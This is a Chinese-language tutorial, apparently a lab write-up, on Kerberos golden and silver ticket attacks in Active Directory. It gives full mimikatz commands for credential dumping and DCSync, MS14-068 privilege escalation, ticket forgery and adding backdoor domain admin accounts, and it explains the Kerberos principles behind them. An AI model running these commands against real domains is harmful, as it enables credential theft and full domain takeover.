域渗透--金银票据问题

金票据

• 伪造凭据，提升域内普通用户权限

以admin用户登入任意一台域内主机

 

收集域信息

命令有：net config workstation，可以看到域名为:cyberpeace。

              nltest /dsgetdc:域名，可以看到域控主机名为：scene。

 

 

以admin权限运行mimikztz

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

找到域内一个用户和对应密码

 

 

使用该域用户登入域内

执行：dir \scene.cyberpeace.com\c$，尝试列出域控目录，提醒权限不够

尝试利用MS14-068来将用户的权限提升到域管权限

 

检查是否有提权漏洞，其补丁为 3011780，我们执行命令: systeminfo |find "3011780"，如果返回为空就说明没有打补丁，存在MS14-068漏洞。

 

 

MS14-068漏洞利用方法：

MS14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址

 

 

目前我们已经知道域成员devuser和其密码，域控制器地址scene.cyberpeace.com，还需要知道的是devuser的SID值。

 

通过Whoami /all或者whoami /user，查看devuser用户的suid：

 

 

 

执行命令：

C:\MS14-068>MS14-068.exe -u [email protected] -p HOTdev123456 -s S-1-5-21-97341123-1865264218-933115267-1108 -d scene.cyberpeace.com

命令执行成功后会在当前目录下生成一个凭证。

 

再使用mimikatz清空之前缓存的凭证，导入伪造的凭证：mimikatz # kerberos::purge  //清空票据mimikatz # kerberos::ptc 凭证文件地址

此刻再输入：

dir \\scene.cyberpeace.com\c$，发现访问成功，现在我们暂时拥有了域管的权限:

 

域管理员权限维持

添加一个域管用户aaa：

net user aaa Qwe123... /add /domain

net group "Domain Admins" aaa /add /domain 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

• 伪造金票

伪造金票的所需条件：

1、域名称

2、krbtgt的SID值

3、域的KRBTGT账号的Hash

4、伪造任意用户名域的名称我们已经知道，需要的用户名也是任意伪造一个就行，下面我们的目的就是拿到krbtgt的NTLM Hash和SID。

 

 

登录到上面我们创建的域管用户aaa：

 

使用mimikatz导出用户krbtgt的hash：

mimikatz(commandline) # privilege::debug

mimikatz(commandline) # lsadump::dcsync /domain:cyberpeace.com /all /csv

mimikatz(commandline) # lsadump::dcsync /domain:cyberpeace.com /user:krbtgt

 

或者保存到文件中：

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:cyberpeace.com /all /csv " "lsadump::dcsync /domain:cyberpeace.com /user:krbtgt" "exit">log.txt

 

 

现在我们已经得到伪造金票的所有信息，接下来就是利用mimikatz生成金票并保存：

mimikatz.exe "kerberos::golden /admin:system /domain:cyberpeace.com /sid:S-1-5-21-97341123-1865264218-933115267 /krbtgt:95972cdf7b8dde854e74c1871f6d80a0 /ticket:ticket.kirbi" exit

 

/admin：伪造的用户名

/domain：域名称

/sid：SID值，注意是去掉最后的'-502'

/krbtgt：krbtgt的HASH值

/ticket：生成的票据名称    //不是写入内存中的命令！

 

命令执行成功后会在当前目录下生成一个.kirbi文件。

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

• 金票的使用

我们重新登录到域内普通用户devuser，此时该用户的域管权限已经消失。

我们通过mimikatz中的kerberos::ptt功能将ticket.kirbi导入内存中，利用金票再将devuser用户的权限提升到域管权限。

 

mimikatz # kerberos::purge       

mimikatz # kerberos::ptt ticket.kirbi

 

此时尝试创建一个ccc的域管账号，命令执行成功

 

 

 

 

 

 

 

 

 

 

 

 

 

黄金股票的攻击原理

黄金票据攻击原理：

在Kerberos认证中，Client通过AS(身份认证服务)认证后，AS会给Client一个Logon Session Key和TGT，而Logon Session Key并不会保存在KDC中，krbtgt的NTLM Hash又是固定的，所以只要得到krbtgt的NTLM Hash，就可以伪造TGT和Logon Session Key来进入下一步Client与TGS的交互。而已有了金票后，就跳过AS验证，不用验证账户和密码，所以也不担心域管密码修改。
 

 

特点：

不需要与AS进行交互，需要用户krbtgt的 NTLM Hash

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

银票据

• 伪造凭据，提升域内普通用户权限

同上金票据

 

 

• 伪造银票

登录上面创建的域管用户，以管理员权限去运行mimikatz，得到域管用户bbb的SID和NTLM Hash。

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

将log.txt保存到本地，再重新登录到域内机器的本地账户administrator，使用mimikatz清空票据，再导入伪造的票据，具体伪造票据的命令为: kerberos::golden /domain:cyberpeace.com /sid:S-1-5-21-2718660907-658632824-2072795563 /target:scene.cyberpeace.com /service:cifs /rc4:9a68826fdc2811f20d1f73a471ad7b9a /user:test /ptt 

 

使用方法：

kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLM Hash> /user:<用户名> /ptt

 

其中的用户名可以随便写

服务类型可以从以下内容中来进行选择，针对某一些服务来进行伪造。

测试一下，成功执行dir \\scene.cyberpeace.com\c$ ，并且可以创建域管账号: 

 

 

白银票据的攻击原理

白银票据攻击原理：

如果说黄金票据是伪造的TGT，那么白银票据就是伪造的ST。在Kerberos认证的第三部，Client带着ST和Authenticator3向Server上的某个服务进行请求，Server接收到Client的请求之后，通过自己的Master Key 解密ST，从而获得 Session Key。通过 Session Key 解密 Authenticator3，进而验证对方的身份，验证成功就让 Client 访问server上的指定服务了。所以我们只需要知道Server用户的Hash就可以伪造出一个ST，且不会经过KDC，但是伪造的门票只对部分服务起作用。

 

特点：

1、不需要与KDC进行交互 

2、需要server的NTLM hash

 

 

 

 

 

 

 

 

 

 

 

 

金票和银票的区别

获取的权限不同

金票：伪造的TGT，可以获取任意Kerberos的访问权限

银票：伪造的ST，只能访问指定的服务，如CIFS

认证流程不同

金票：同KDC交互，但不同AS交互

银票：不同KDC交互，直接访问Server

加密方式不同

金票：由krbtgt NTLM Hash 加密

银票：由服务账号 NTLM Hash 加密